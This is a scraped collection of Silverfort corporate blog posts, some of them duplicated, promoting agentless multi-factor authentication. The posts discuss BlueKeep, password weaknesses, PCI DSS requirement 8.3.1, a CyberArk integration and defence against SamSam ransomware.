Evidently, the EternalBlue vulnerability was exploited on a massive scale well after the patch was released by Microsoft. Partial exploits have already been released for the BlueKeep vulnerability, so it is just a matter of time before the vulnerability is widely used by attackers. Protecting Your Systems from the BlueKeep vulnerability: The first thing you should do is identify any unpatched or old operating systems in your network and patch all affected systems – this should be done as soon as possible! Next, you should use Network Level Authentication (NLA) where possible: NLA requires authentication before the vulnerability can be triggered. Microsoft strongly recommends this, yet it isn’t the default setting. 2 Enabling NLA to require authentication before the vulnerability can be triggered Enabling NLA prevents pre-authentication execution. However, it’s important to remember that affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker has valid credentials that can be used to successfully authenticate. Preventing Exploitation of Compromised Credentials for Remote Code Execution with Silverfort As mentioned above, enabling NLA is critical for preventing the pre-authentication execution, but it’s not enough because if an attacker already has valid credentials (which are quite easy to get these days), the attacker and still gain access and exploit the RCE vulnerability. This is where Silverfort comes in and prevents the use of compromised credentials for RCE exploitation and other remote desktop protocol attacks:Silverfort’s agentless, proxyless authentication platform can enforce multi-factor authentication (MFA) and strong authentication policies to prevent unauthorized access to any system, no matter what it is or where it is – whether on-premises or in the cloud. This includes systems that couldn’t be protected by MFA solutions until today, like IT infrastructure, homegrown and legacy applications, file shares, databases, and more. When an attacker tries to exploit compromised credentials to gain access to a system, Silverfort can require a second authentication factor to validate the user’s identity. While legitimate users can easily authenticate, an attacker will fail the 2nd authentication factor and therefore his/her access will be denied. Silverfort can apply static MFA policies that require users to authenticate with a 2nd factor any time they access systems, but that can be quite disruptive. Therefore, risk-based adaptive policies are highly recommended: Adaptive policies can be set to require a 2nd authentication factor only when risk levels are high – this helps minimize disruptions without compromising security. To read more about Silverfort’s adaptive policies and AI-based Risk Engine download this free whitepaper. 3 Silverfort can apply static MFA policies or risk-based adaptive authentication policies Stopping Lateral Movement with Zero-Trust Security Policies Silverfort can enforce MFA and secure access not only for external access, but also inside corporate networks. This includes both user-to-machine access and machine-to-machine access (service accounts). Service accounts are used by various corporate systems to communicate with other systems and automate processes. Such accounts are a prime target for attackers, since they are often equipped with high privileges and their passwords are rarely changed. But because these accounts are used by machines, rather than humans, they cannot be protected with regular multi-factor authentication methods. Silverfort introduces a unique capability for securing the use of service accounts, which prevents unauthorized entities from stealing or misusing them. This is achieved without any change to the relevant systems. Silverfort enables organizations to implement a holistic zero-trust security model without deploying software agents or proxies, and without requiring changes to existing networks. Its innovative architecture ensures secure access to any system, no matter where it is, or what it is. This includes user-to-machine and machine-to-machine access, as well as any administrative access. Because Silverfort avoids any modifications to existing assets and infrastructure, it allows not only small agile companies but also large traditional enterprises to achieve zero trust security throughout their networks. Yaron Kassner, CTO and Co Founder, SilverfortSilverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, raised to the rank of Captain, and received a prestigious excellence award. Yaron holds a B. Sc. in Mathematics, Summa Cum Laude, an M. Sc. and Ph. D. in Computer Science from the Technion – Israel Institute of Technology. Want to learn more or see a demo? – Contact us today! --- - Published: 2019-05-02 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/passwords-cant-rely-on-them-cant-live-without-them/ By Dana Tamir, VP Market Strategy, SilverfortMay 2nd, 2019 is national password day - a good opportunity to discuss our ‘love-hate’ relationship with passwords. There are many reasons why we can’t rely on password-only authentication mechanisms. Yet we can’t really get rid of them either. Let me explain: The Problem with Passwords When users are asked to create passwords – whether they are opening new accounts or changing passwords of existing accounts – they are likely to choose passwords they can remember. The problem is that many users choose weak passwords, that can be easily guessed. A recently published list of the most commonly used passwords in 2018 shows a grim picture. It claims the most commonly used password is ‘123456’, and the 2nd spot is the obvious choice, ‘password’. True, some people use stronger passwords. However, many reuse the same password across multiple systems and websites. Research shows that 52% reuse the same password for multiple, but not all, accounts, while another 13% reuse the same password for all of their accounts. Some even use the same passwords across both work-related systems and personal applications. This makes a stolen or compromised user password more valuable than ever. And, if you think that requiring users to regularly change their passwords can help, well, I’m sorry to tell you it doesn’t. That’s because those who do regularly change their passwords, too often make only small and predictable changes to their existing passwords. One reason for this weakness might well be their emotional connection to their password selection routine. This is the reason behind Microsoft’s recent announcement that it will be dropping the password expiration policies: “Periodic password expiration is an ancient and obsolete mitigation of very low value, and we don’t believe it’s worthwhile for our baseline to enforce any specific value. By removing it from our baseline rather than recommending a particular value or no expiration, organizations can choose whatever best suits their perceived needs without contradicting our guidance” explains Aaron Margosis. No wonder that brute-force attacks, which use a trial-and-error method to obtain a user’s password, and phishing scams, which fraudulently attempt to obtain user’s passwords by disguising as communications from trusted people or organizations, are on the rise. Data Breaches Involving Compromised Credentials On The Rise Considering everything we’ve discussed so far, it’s not surprising that compromised credentials are leveraged in more and more breaches. In fact, 4 out of 5 breaches today involved the use of compromised credentials. The problem is that when passwords or their corresponding hashes are stolen, it’s difficult to detect or restrict their unauthorized use. Or is it? Why Can’t We Live Without Them? Why can’t we get rid of passwords? Surely someone can come up with a better solution to authenticate users? Yes, that’s true - there are better ways to authenticate users and validate their identities. However, passwords aren’t going away anytime soon. You see, our corporate networks are built on password-based authentication protocols, and these protocols will stay with us for many years. Many of our homegrown and legacy systems are designed for password-only authentication. Modifying our network protocols and changing the authentication methods of existing systems and servers just to avoid passwords isn’t practical. So no, passwords aren't going away any time soon. If You Can’t Get Rid of Passwords - Add Another Layer To Them The reality is that password-only authentication mechanisms aren’t secure enough. So what can be done to make authentication processes more secure? The answer has been known for a while: layer them with an additional authentication mechanism. Multi-Factor Authentication (MFA) solutions, sometimes referred to 2FA, have been available for decades. They provide that additional authentication layer by requiring users to authenticate with an additional factor before they are granted access to sensitive systems. Over the years they have been proven as an effective and critical security measure to prevent the exploitation of stolen/compromised credentials. So Why Aren’t We Using Them To Protect All Of Our Sensitive Systems? While many organizations are looking to protect many proprietary, homegrown and legacy systems with MFA, they find it very difficult to do. That’s because mainstream MFA solutions require either the implementation of software agents on each protected system, or implementation of proxies, or local configurations and integrations. These requirement make it difficult and sometimes impossible to deploy them on these types of systems. How Can Silverfort Help? Silverfort offers the first agentless, proxy-less, authentication platform seamlessly enabling MFA for any sensitive system, including those that couldn’t be protected until today. These include: proprietary, homegrown and legacy systems, critical IT infrastructure, file shares and databases, IoT devices, SCADA servers, medical systems like PACS and EHR, and many more. If you want to learn more, please contact us. Final Note: As I wrote this blog, I was reminded of a brilliant campaign that launched a few years ago (don’t know the source): Treat your passwords like your underwear: Never share them with anyone Change them regularly Keep them off your desk I’d like to suggest a 4th recommendation: Put something over them... Dana Tamir, VP Market Strategy, SilverfortDana is a veteran of the cybersecurity industry with over 15 years of real-world expertise and leadership roles in leading security companies. Prior to Silverfort, Dana served as VP Marketing at Indegy. Before that, she served as Director of Enterprise Security at Trusteer (acquired by IBM in 2012). She also held various roles at Imperva, Symantec, Bindview, and Amdocs. Dana holds an engineering degree from the Technion – Israel Institute of Technology, in addition to a number of industry and vendor certifications. To learn more about Silverfort and see a demo, contact us today! Wishing everyone a Happy National Password Day! --- - Published: 2019-02-11 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/3-ways-agentless-mfa-successfully-tackles-pci-dss-8-3-1-challenges/ One of the most common questions we get from our customers, is regarding requirement 8.3.1 of PCI DSSv3.2: In its latest revision, PCI extends MFA as a requirement for all personnel with administrative access (console and non-console), in addition... One of the most common questions we get from customers is regarding requirement 8. 3. 1 of PCI DSSv3. 2: In its latest revision, PCI extends MFA as a requirement for all personnel with administrative access (console and non-console), in addition to any personnel with remote access to the Cardholder Data Environment (CDE). The requirement to secure all administrative access to the CDE with MFA should come as no surprise. After all, most data breaches in the retail sector involve unauthorized access to the cardholder data environment. PCI explains that the effectiveness of passwords as an authentication mechanism is questionable, therefore additional security measures are required. In fact, in an interview with Troy Leach, PCI Security Standards Council Chief Technology Officer, he explains: "The most important point is that the change to the requirement is intended for all administrative access into the cardholder data environment, even from within a company’s own network. This applies to any administrator, whether it be a third party or internal, that has the ability to change systems and other credentials within that network to potentially compromise the security of the environment. " So there’s no doubt that the requirement makes sense. However, addressing this requirement is not trivial in most CDE environments due to the nature of the systems and tools in scope. Where's the challenge? The scope of the CDE environment includes any systems that process, store and/or transmit cardholder and payment data, as well as anything that directly connects to, or supports, this environment. This means that you need to enforce MFA on the following list of systems and tools that are typically found in CDEs: Any homegrown system that processes, stores or transmit credit card and payment data All relevant production servers – Windows and Linux Critical IT infrastructure – including Hypervisors, V-Center, Network devices, File Shares, Databases Virtual Private Network (VPN) Virtual Desktop Infrastructure (VDI) PAM solutions (like CyberArk) Remote Desktop (RDP) Secure Shell (SSH) Any cloud services that might be part of the processing As you can see, depending on the mix of systems and tools in your CDE environment, not only will you need to implement multiple MFA solutions or complex network segmentations -- a difficult task on its own -- it would be unfeasible for many of these systems. Why? Because no out-of-the-box support is available or because their sensitive and critical nature won’t allow you to deploy any software agents or proxies, or make any configuration changes. After all, nobody wants to risk the availability and stability of any critical production system. Securing All CDE Access with Silverfort’s Agentless MFA Silverfort’s holistic authentication platform enables organizations to add MFA to any system -- including systems that were considered unprotectable until today -- without deploying any software agents, implementing proxies or requiring any configuration changes. This enables our customers to easily protect all their CDE systems, as well as any access to those systems and address PCI DSS requirement 8. 3. 1. Here's how: How does it work? 1) Silverfort monitors and analyzes all user access requests across all systems and environments by looking at the authentication protocols. This means that it doesn’t need to integrate with any CDE system, or require use of any software agents. 2) By adding MFA on top of the authentication protocols, rather than per system, Silverfort can protect any system, including homegrown applications, sensitive production servers, PAM solutions and administrative access (RDP, SSH), IT infrastructure and more. 3) Silverfort continuously analyzes risk and trust levels across the network using an advanced AI-driven risk engine. Because Silverfort monitors and analyzes all user and machine access requests -- and isn’t limited to specific protected systems -- it analyzes about 50x more information than any other adaptive authentication solution. This enables it to accurately detect behavior-based anomalies and recognize malicious patterns such as brute force attacks, lateral movement, ransomware and more, and apply effective risk-based authentication policies to block threats in real-time. What's better, it does all this while allowing legitimate users to continue their work with minimal disruptions. It can also step up authentication requirements in response to third-party security alerts. Pretty cool, but what about a real life scenario? We're glad you asked! BlueSnap Customer Case Study: To comply with PCI DSS requirement 8. 3, BlueSnap, a global payment processor, needed to implement MFA on VMware vCenter Server, which is the IT infrastructure supporting the Cardholder Data Environment, as well as for any access to production Linux servers. They needed an MFA solution that does not require special integration or installation of software agents. They selected Silverfort to secure all privileged access, including RDP, SSH, and admin access to vCenter. The implementation was quick and easy. A proof of concept was set up in just a couple of hours, and within a month BlueSnap extended the solution to secure privileged access in all offices across the globe. BlueSnap-Case-Study-MFA-for-Sensitive-Assets. pdf Download the solution brief In addition to the 8. 3. 1 requirement, Silverfort can address other PCI DSS requirements with a unique and holistic approach – ask us for a demo to learn more. --- - Published: 2019-02-11 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/3-ways-agentless-mfa-successfully-tackles-pci-dss-8-3-1-challenges-2/ One of the most common questions we get from our customers, is regarding requirement 8.3.1 of PCI DSSv3.2: In its latest revision, PCI extends MFA as a requirement for all personnel with administrative access (console and non-console), in addition... One of the most common questions we get from customers is regarding requirement 8. 3. 1 of PCI DSSv3. 2: In its latest revision, PCI extends MFA as a requirement for all personnel with administrative access (console and non-console), in addition to any personnel with remote access to the Cardholder Data Environment (CDE). The requirement to secure all administrative access to the CDE with MFA should come as no surprise. After all, most data breaches in the retail sector involve unauthorized access to the cardholder data environment. PCI explains that the effectiveness of passwords as an authentication mechanism is questionable, therefore additional security measures are required. In fact, in an interview with Troy Leach, PCI Security Standards Council Chief Technology Officer, he explains: "The most important point is that the change to the requirement is intended for all administrative access into the cardholder data environment, even from within a company’s own network. This applies to any administrator, whether it be a third party or internal, that has the ability to change systems and other credentials within that network to potentially compromise the security of the environment. " So there’s no doubt that the requirement makes sense. However, addressing this requirement is not trivial in most CDE environments due to the nature of the systems and tools in scope. Where's the challenge? The scope of the CDE environment includes any systems that process, store and/or transmit cardholder and payment data, as well as anything that directly connects to, or supports, this environment. This means that you need to enforce MFA on the following list of systems and tools that are typically found in CDEs: Any homegrown system that processes, stores or transmit credit card and payment data All relevant production servers – Windows and Linux Critical IT infrastructure – including Hypervisors, V-Center, Network devices, File Shares, Databases Virtual Private Network (VPN) Virtual Desktop Infrastructure (VDI) PAM solutions (like CyberArk) Remote Desktop (RDP) Secure Shell (SSH) Any cloud services that might be part of the processing As you can see, depending on the mix of systems and tools in your CDE environment, not only will you need to implement multiple MFA solutions or complex network segmentations -- a difficult task on its own -- it would be unfeasible for many of these systems. Why? Because no out-of-the-box support is available or because their sensitive and critical nature won’t allow you to deploy any software agents or proxies, or make any configuration changes. After all, nobody wants to risk the availability and stability of any critical production system. Securing All CDE Access with Silverfort’s Agentless MFA Silverfort’s holistic authentication platform enables organizations to add MFA to any system -- including systems that were considered unprotectable until today -- without deploying any software agents, implementing proxies or requiring any configuration changes. This enables our customers to easily protect all their CDE systems, as well as any access to those systems and address PCI DSS requirement 8. 3. 1. Here's how: How does it work? 1) Silverfort monitors and analyzes all user access requests across all systems and environments by looking at the authentication protocols. This means that it doesn’t need to integrate with any CDE system, or require use of any software agents. 2) By adding MFA on top of the authentication protocols, rather than per system, Silverfort can protect any system, including homegrown applications, sensitive production servers, PAM solutions and administrative access (RDP, SSH), IT infrastructure and more. 3) Silverfort continuously analyzes risk and trust levels across the network using an advanced AI-driven risk engine. Because Silverfort monitors and analyzes all user and machine access requests -- and isn’t limited to specific protected systems -- it analyzes about 50x more information than any other adaptive authentication solution. This enables it to accurately detect behavior-based anomalies and recognize malicious patterns such as brute force attacks, lateral movement, ransomware and more, and apply effective risk-based authentication policies to block threats in real-time. What's better, it does all this while allowing legitimate users to continue their work with minimal disruptions. It can also step up authentication requirements in response to third-party security alerts. Pretty cool, but what about a real life scenario? We're glad you asked! BlueSnap Customer Case Study: To comply with PCI DSS requirement 8. 3, BlueSnap, a global payment processor, needed to implement MFA on VMware vCenter Server, which is the IT infrastructure supporting the Cardholder Data Environment, as well as for any access to production Linux servers. They needed an MFA solution that does not require special integration or installation of software agents. They selected Silverfort to secure all privileged access, including RDP, SSH, and admin access to vCenter. The implementation was quick and easy. A proof of concept was set up in just a couple of hours, and within a month BlueSnap extended the solution to secure privileged access in all offices across the globe. BlueSnap-Case-Study-MFA-for-Sensitive-Assets. pdf Download the solution brief In addition to the 8. 3. 1 requirement, Silverfort can address other PCI DSS requirements with a unique and holistic approach – ask us for a demo to learn more. --- - Published: 2019-01-22 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/simplify-strengthen-authentication-cyberark-silverforts-agentless-mfa/ We are proud to announce Silverfort’s integration with CyberArk. The joint Silverfort and CyberArk Privileged Access Security Solution enables our joint customers to simplify and secure privileged access with an agentless MFA platform. We are proud to announce Silverfort’s integration with CyberArk. The joint Silverfort and CyberArk Privileged Access Security Solution enables our joint customers to simplify and secure privileged access with an agentless MFA platform. Since the solution has been made available on the CyberArk Marketplace, many customers have expressed their interest and overall market response has been very positive. “Silverfort’s Agentless MFA solution provides out-of-the-box protection for the CyberArk Privileged Access Security Solution,” says Silverfort’s CEO Hed Kovetz. “Not only does it enable our customers to easily strengthen secure access, it also simplifies user workflows delivering tremendous value to our customers. ” Why are customers so excited about the offering? Customers are excited about Silverfort’s MFA offering because it enables them to: Strengthen authentication into the CyberArk Privileged Access Security Solution with an agentless MFA solution that does not require cumbersome integrations, modifications to CyberArk, or changes to user workflows. Simplify secure privileged access and reduce administrative connection time to the CyberArk Privileged Session Manager for Windows with a single authentication that does not require Time-based One-time Password (TOTP) tokens and eliminates the need to wait for One-time Passwords (OTP) to expire between sessions. User-friendly 2nd authentication factor: Silverfort’s mobile app provides push notifications allowing users to easily authenticate and continue to work. Silverfort’s browser notifications or third-party tokens can be used as alternatives. Get a comprehensive audit trail, informative dashboards with insights and investigative drill-down capabilities. Reduce MFA deployment time, resource investment and maintenance costs. Simplifying Secure Access and Reducing Connection Time to Multiple Sessions with Agentless MFA Protecting privileged access to sensitive systems and resources is critical to organizations. If privileged accounts, credentials or secrets become compromised, an adversary may gain unfettered access to the organization’s crown jewels. This is why CyberArk recommends enforcing MFA for its solution. Silverfort provides a single 2nd authentication factor to the CyberArk Privileged Access Security Solution, including Privileged Session Manager (including the RDP and SSH Proxies). Once implemented, users no longer need to use Radius-OTP based pin codes in order to authenticate to each session. Instead, Silverfort’s mobile app provides push notifications, which are a user-friendly 2nd authentication factor. Silverfort’s browser notifications or third-party tokens can be used as alternatives. Silverfort’s unique ability to provide MFA to Microsoft Single Sign-On and Active Directory based authentication, enables Silverfort to bring frictionless MFA to CyberArk users. It eliminates the need to wait for OTPs to expire between sessions and greatly simplifies secure administrative access to multiple sessions improving the administrative user’s experience. Strengthening Authentication Without Any Agents, Proxies or Changes to CyberArk Silverfort’s agentless MFA delivers seamless strong authentication to the CyberArk Privileged Access Security Solution without requiring agents or changes to user endpoints or servers, without inline proxies and without any changes to CyberArk. Unlike traditional MFA solutions that typically require agents or complex integrations and are often challenging to implement for the RDP Proxy, Silverfort’s agentless non-intrusive approach is easy to implement. The agentless architecture minimizes implementation time and maintenance costs. Setting up the required authentication policies in Silverfort’s Management Console takes only minutes and does not require any changes on CyberArk’s side. Seamless Non-Intrusive Deployment Architecture Download the solution brief The Silverfort Authentication Platform is delivered as a virtual appliance. It does not require any software agents or local configurations on corporate endpoints and servers, or any changes to existing CyberArk configurations. Silverfort monitors all user authentication requests for accessing the CyberArk Privileged Access Security Solution and requires users to confirm their identity according to the authentication policies. Silverfort’s web-based admin console enables security admins to easily apply strong authentication policies across the organization, identify authentication vulnerabilities, and achieve broad visibility and auditing of authentication and access activity. Why wait any longer? Contact us today to schedule a pilot in your organization. --- - Published: 2019-01-22 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/simplify-strengthen-authentication-cyberark-silverforts-agentless-mfa-2/ We are proud to announce Silverfort’s integration with CyberArk. The joint Silverfort and CyberArk Privileged Access Security Solution enables our joint customers to simplify and secure privileged access with an agentless MFA platform. We are proud to announce Silverfort’s integration with CyberArk. The joint Silverfort and CyberArk Privileged Access Security Solution enables our joint customers to simplify and secure privileged access with an agentless MFA platform. Since the solution has been made available on the CyberArk Marketplace, many customers have expressed their interest and overall market response has been very positive. “Silverfort’s Agentless MFA solution provides out-of-the-box protection for the CyberArk Privileged Access Security Solution,” says Silverfort’s CEO Hed Kovetz. “Not only does it enable our customers to easily strengthen secure access, it also simplifies user workflows delivering tremendous value to our customers. ” Why are customers so excited about the offering? Customers are excited about Silverfort’s MFA offering because it enables them to: Strengthen authentication into the CyberArk Privileged Access Security Solution with an agentless MFA solution that does not require cumbersome integrations, modifications to CyberArk, or changes to user workflows. Simplify secure privileged access and reduce administrative connection time to the CyberArk Privileged Session Manager for Windows with a single authentication that does not require Time-based One-time Password (TOTP) tokens and eliminates the need to wait for One-time Passwords (OTP) to expire between sessions. User-friendly 2nd authentication factor: Silverfort’s mobile app provides push notifications allowing users to easily authenticate and continue to work. Silverfort’s browser notifications or third-party tokens can be used as alternatives. Get a comprehensive audit trail, informative dashboards with insights and investigative drill-down capabilities. Reduce MFA deployment time, resource investment and maintenance costs. Simplifying Secure Access and Reducing Connection Time to Multiple Sessions with Agentless MFA Protecting privileged access to sensitive systems and resources is critical to organizations. If privileged accounts, credentials or secrets become compromised, an adversary may gain unfettered access to the organization’s crown jewels. This is why CyberArk recommends enforcing MFA for its solution. Silverfort provides a single 2nd authentication factor to the CyberArk Privileged Access Security Solution, including Privileged Session Manager (including the RDP and SSH Proxies). Once implemented, users no longer need to use Radius-OTP based pin codes in order to authenticate to each session. Instead, Silverfort’s mobile app provides push notifications, which are a user-friendly 2nd authentication factor. Silverfort’s browser notifications or third-party tokens can be used as alternatives. Silverfort’s unique ability to provide MFA to Microsoft Single Sign-On and Active Directory based authentication, enables Silverfort to bring frictionless MFA to CyberArk users. It eliminates the need to wait for OTPs to expire between sessions and greatly simplifies secure administrative access to multiple sessions improving the administrative user’s experience. Strengthening Authentication Without Any Agents, Proxies or Changes to CyberArk Silverfort’s agentless MFA delivers seamless strong authentication to the CyberArk Privileged Access Security Solution without requiring agents or changes to user endpoints or servers, without inline proxies and without any changes to CyberArk. Unlike traditional MFA solutions that typically require agents or complex integrations and are often challenging to implement for the RDP Proxy, Silverfort’s agentless non-intrusive approach is easy to implement. The agentless architecture minimizes implementation time and maintenance costs. Setting up the required authentication policies in Silverfort’s Management Console takes only minutes and does not require any changes on CyberArk’s side. Seamless Non-Intrusive Deployment Architecture Download the solution brief The Silverfort Authentication Platform is delivered as a virtual appliance. It does not require any software agents or local configurations on corporate endpoints and servers, or any changes to existing CyberArk configurations. Silverfort monitors all user authentication requests for accessing the CyberArk Privileged Access Security Solution and requires users to confirm their identity according to the authentication policies. Silverfort’s web-based admin console enables security admins to easily apply strong authentication policies across the organization, identify authentication vulnerabilities, and achieve broad visibility and auditing of authentication and access activity. Why wait any longer? Contact us today to schedule a pilot in your organization. --- - Published: 2019-01-04 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/passwords-cant-rely-on-them-cant-live-without-them-2/ By Dana Tamir, VP Market Strategy, SilverfortMay 2nd, 2019 is national password day - a good opportunity to discuss our ‘love-hate’ relationship with passwords. There are many reasons why we can’t rely on password-only authentication mechanisms. Yet we can’t really get rid of them either. Let me explain: The Problem with Passwords When users are asked to create passwords – whether they are opening new accounts or changing passwords of existing accounts – they are likely to choose passwords they can remember. The problem is that many users choose weak passwords, that can be easily guessed. A recently published list of the most commonly used passwords in 2018 shows a grim picture. It claims the most commonly used password is ‘123456’, and the 2nd spot is the obvious choice, ‘password’. True, some people use stronger passwords. However, many reuse the same password across multiple systems and websites. Research shows that 52% reuse the same password for multiple, but not all, accounts, while another 13% reuse the same password for all of their accounts. Some even use the same passwords across both work-related systems and personal applications. This makes a stolen or compromised user password more valuable than ever. And, if you think that requiring users to regularly change their passwords can help, well, I’m sorry to tell you it doesn’t. That’s because those who do regularly change their passwords, too often make only small and predictable changes to their existing passwords. One reason for this weakness might well be their emotional connection to their password selection routine. This is the reason behind Microsoft’s recent announcement that it will be dropping the password expiration policies: “Periodic password expiration is an ancient and obsolete mitigation of very low value, and we don’t believe it’s worthwhile for our baseline to enforce any specific value. By removing it from our baseline rather than recommending a particular value or no expiration, organizations can choose whatever best suits their perceived needs without contradicting our guidance” explains Aaron Margosis. No wonder that brute-force attacks, which use a trial-and-error method to obtain a user’s password, and phishing scams, which fraudulently attempt to obtain user’s passwords by disguising as communications from trusted people or organizations, are on the rise. Data Breaches Involving Compromised Credentials On The Rise Considering everything we’ve discussed so far, it’s not surprising that compromised credentials are leveraged in more and more breaches. In fact, 4 out of 5 breaches today involved the use of compromised credentials. The problem is that when passwords or their corresponding hashes are stolen, it’s difficult to detect or restrict their unauthorized use. Or is it? Why Can’t We Live Without Them? Why can’t we get rid of passwords? Surely someone can come up with a better solution to authenticate users? Yes, that’s true - there are better ways to authenticate users and validate their identities. However, passwords aren’t going away anytime soon. You see, our corporate networks are built on password-based authentication protocols, and these protocols will stay with us for many years. Many of our homegrown and legacy systems are designed for password-only authentication. Modifying our network protocols and changing the authentication methods of existing systems and servers just to avoid passwords isn’t practical. So no, passwords aren't going away any time soon. If You Can’t Get Rid of Passwords - Add Another Layer To Them The reality is that password-only authentication mechanisms aren’t secure enough. So what can be done to make authentication processes more secure? The answer has been known for a while: layer them with an additional authentication mechanism. Multi-Factor Authentication (MFA) solutions, sometimes referred to 2FA, have been available for decades. They provide that additional authentication layer by requiring users to authenticate with an additional factor before they are granted access to sensitive systems. Over the years they have been proven as an effective and critical security measure to prevent the exploitation of stolen/compromised credentials. So Why Aren’t We Using Them To Protect All Of Our Sensitive Systems? While many organizations are looking to protect many proprietary, homegrown and legacy systems with MFA, they find it very difficult to do. That’s because mainstream MFA solutions require either the implementation of software agents on each protected system, or implementation of proxies, or local configurations and integrations. These requirement make it difficult and sometimes impossible to deploy them on these types of systems. How Can Silverfort Help? Silverfort offers the first agentless, proxy-less, authentication platform seamlessly enabling MFA for any sensitive system, including those that couldn’t be protected until today. These include: proprietary, homegrown and legacy systems, critical IT infrastructure, file shares and databases, IoT devices, SCADA servers, medical systems like PACS and EHR, and many more. If you want to learn more, please contact us. Final Note: As I wrote this blog, I was reminded of a brilliant campaign that launched a few years ago (don’t know the source): Treat your passwords like your underwear: Never share them with anyone Change them regularly Keep them off your desk I’d like to suggest a 4th recommendation: Put something over them... Dana Tamir, VP Market Strategy, SilverfortDana is a veteran of the cybersecurity industry with over 15 years of real-world expertise and leadership roles in leading security companies. Prior to Silverfort, Dana served as VP Marketing at Indegy. Before that, she served as Director of Enterprise Security at Trusteer (acquired by IBM in 2012). She also held various roles at Imperva, Symantec, Bindview, and Amdocs. Dana holds an engineering degree from the Technion – Israel Institute of Technology, in addition to a number of industry and vendor certifications. To learn more about Silverfort and see a demo, contact us today! Wishing everyone a Happy National Password Day! --- - Published: 2018-12-02 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/how-to-stop-iranian-samsam-hackers-from-taking-your-network-for-ransom/ SamSam – sounds cute, right? Well, it’s not. SamSam is a destructive ransomware that affected more than 200 victims across the US, including hospitals, city governments, and other organizations in 2018. On November 28, the US Department of Justice has charged two Iranian nationals with... By Yaron Kassner, CTO and Co Founder, Silverfort SamSam – sounds cute, right? Well, it’s not. SamSam is a destructive ransomware that affected more than 200 victims across the US, including hospitals, city governments, and other organizations in 2018. On November 28, the US Department of Justice has charged two Iranian nationals with computer hacking offenses in connection with the global SamSam ransomware outbreak. The alleged criminals are currently in Iran, out of the reach of US law enforcement, and I doubt the two suspects will travel to the U. S. to face questioning. I also doubt that these attacks will stop. So, it’s important to understand how this attack operates and implement some protective measures. Compromising the First Endpoint SamSam targets computers that are open to remote desktops from the internet. Finding such endpoints is super easy: free tools like Shodan can provide a list of such machines. As of today, there are 2,475,311 records of remote desktops open to the Internet in Shodan. The passwords to these desktops can be hacked with brute-force attacks or simply purchased on the dark web. The increased use of cloud environments puts organizations at risk, because a reckless admin could easily expose a machine in the cloud without protecting access to it from the internet. Moving Deeper into the Network SamSam doesn’t only encrypt the files of a single infected endpoint. Once the endpoint is compromised, SamSam utilizes stolen credentials and exploits vulnerabilities like EternalBlue to move laterally across the network. It uses “feed of the earth techniques” i. e. existing administration tools. This enables the ransomware to reach more valuable servers that hold more valuable data. Instead of holding one computer hostage, it takes over the entire network. Backups are often thought of as being a defense mechanism for ransomware prevention. However, the ability to move laterally in the network also enables SamSam to reach these backups and render them useless. A victim whose backups were encrypted, would have to pay the ransom, or lose the data. SamSam Mitigation Costs Exceed the Ransom Payment So far, the hackers made more than $6M in ransom. However, the costs to impacted organizations are much higher, because after paying the ransom and unlocking their files, they also need to make sure that the threat is completely removed from their networks. When the city of Atlanta was infected, they spent a total of $17M in efforts to resolve the incident, even though the ransom requested was much lower than that. In addition to the costs of the ransom, there is the obvious cost of the outage inflicted until the threat is removed. Perhaps that’s one of the reasons the malware is attacking so many healthcare providers – they can’t afford to go down. How to protect your organizations from SamSam Ransomware? Backup your data offline: If you’re counting on your backups to save you from ransomware, you need to make sure that the attacker won’t get to your backups as well. Keep in mind that saving your backups in the network, means that they are exposed to ransomware just as much as any other data in the network. Identify remote desktop servers that are exposed over the internet: Find a way to discover remote desktops that are exposed over the internet. An exposed remote desktop will be subject to a brute-force attack within hours of the exposure over the internet. So, a good way to identify internet-exposed remote desktops is to look for brute-force attacks. Silverfort can help you do that. Protect RDP Access by Enforcing Multi-Factor Authentication – if you have to expose a remote desktop to the internet, use a VPN or a bastion host. These prevent direct network access to the machine. But password-based authentication isn’t enough. You should also add MFA to validate that the credentials are indeed used by a legitimate user. Silverfort enables you to add MFA to these systems without any agents. Prevent lateral movement - Enforcing MFA on the use of administrative tools such as PSExec can effectively block such attacks. However, traditional MFA solutions can’t be implemented for such tools. Silverfort’s agentless MFA platforms can be easily extended to these tools as well. Protect access to your sensitive data – Enforce MFA for any access to sensitive resources, including databases, and file shares. Yaron Kassner, CTO and Co Founder, Silverfort Silverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, raised to the rank of Captain, and received a prestigious excellence award. Yaron holds a B. Sc. in Mathematics, Summa Cum Laude, an M. Sc. and Ph. D. in Computer Science from the Technion – Israel Institute of Technology. To find out how Silverfort can protect your organization against SamSam and other threats, contact us today. --- - Published: 2018-11-18 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/pam-is-king-but-who-is-protecting-the-king-2/ --- By Jonathan Nativ, Sales Director, APAC, Silverfort --- In the game of chess, the king is the most important piece. Once your opponent gets your king, the game is over. Yet the king is a relatively vulnerable piece, and it’s protected by stronger ones like rooks, bishops and of course - the queen. In the IT world, Privileged Access Management (PAM) (many times referred to as a Password Vault) is the ‘King’ because it stores the keys to the kingdom - the credentials of the most important and sensitive users in the organization (privileged users) and many times it is used as the entry point into the organization for external users. Therefore, adversaries will do all they can in order to compromise it. What is a PAM Solution and Why is it Important to Protect? The PAM solution is a centralized repository where all the sensitive credentials are stored and managed. This includes: 1. Domain Administrator credentials 2. Database credentials 3. Cloud infrastructure credentials and access keys 4. Firewall passwords 5. Corporate Social Media Accounts 6. Many more One key thing to note about PAM solutions is that once implemented it becomes the single most sensitive system in the network, as it contains all the credentials of the most privileged users. According to Gartner, securing privileged accounts in an organization is a top priority security project these days. This is due to the fact that compromised credentials were used in more than 80% of data breaches. 